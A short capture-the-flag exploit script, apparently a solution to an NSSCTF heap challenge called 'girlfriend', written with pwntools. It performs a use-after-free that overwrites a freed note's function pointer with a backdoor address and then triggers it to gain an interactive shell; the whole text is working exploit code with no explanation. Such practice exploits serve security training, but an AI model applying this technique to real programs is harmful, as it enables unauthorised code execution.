uaf劫持指针函数
from pwn import *
from LibcSearcher import*
context(arch = 'amd64', os = 'linux', log_level = 'debug')
context.terminal = ['tmux','splitw','-h']
io = process('./girlfriend')
io = remote('node4.anna.nssctf.cn',28808)
s = lambda content : io.send(content)
sl = lambda content : io.sendline(content)
sa = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc = lambda number : io.recv(number)
ru = lambda content : io.recvuntil(content)
def slog(name, address): io.success(name+"==>"+hex(address))
def debug(): gdb.attach(io)
def add(size,name):
sla(":", '1')
sla(" :", str(size))
sla(" :", name)
def delete(index):
sla(":", '2')
sla(" :", str(index))
def show(index):
sla(":", '3')
sla(" :", str(index))
def take(index, content):
sla(":\n", '4')
sla("modify :", str(index))
sa("content\n", content)
backdoor = 0x400baa
add(0x10, 'hahhaa')
add(0x20, 'cccccc')
delete(0)
delete(1)
add(0x10, p64(backdoor))
show(0)
io.interactive()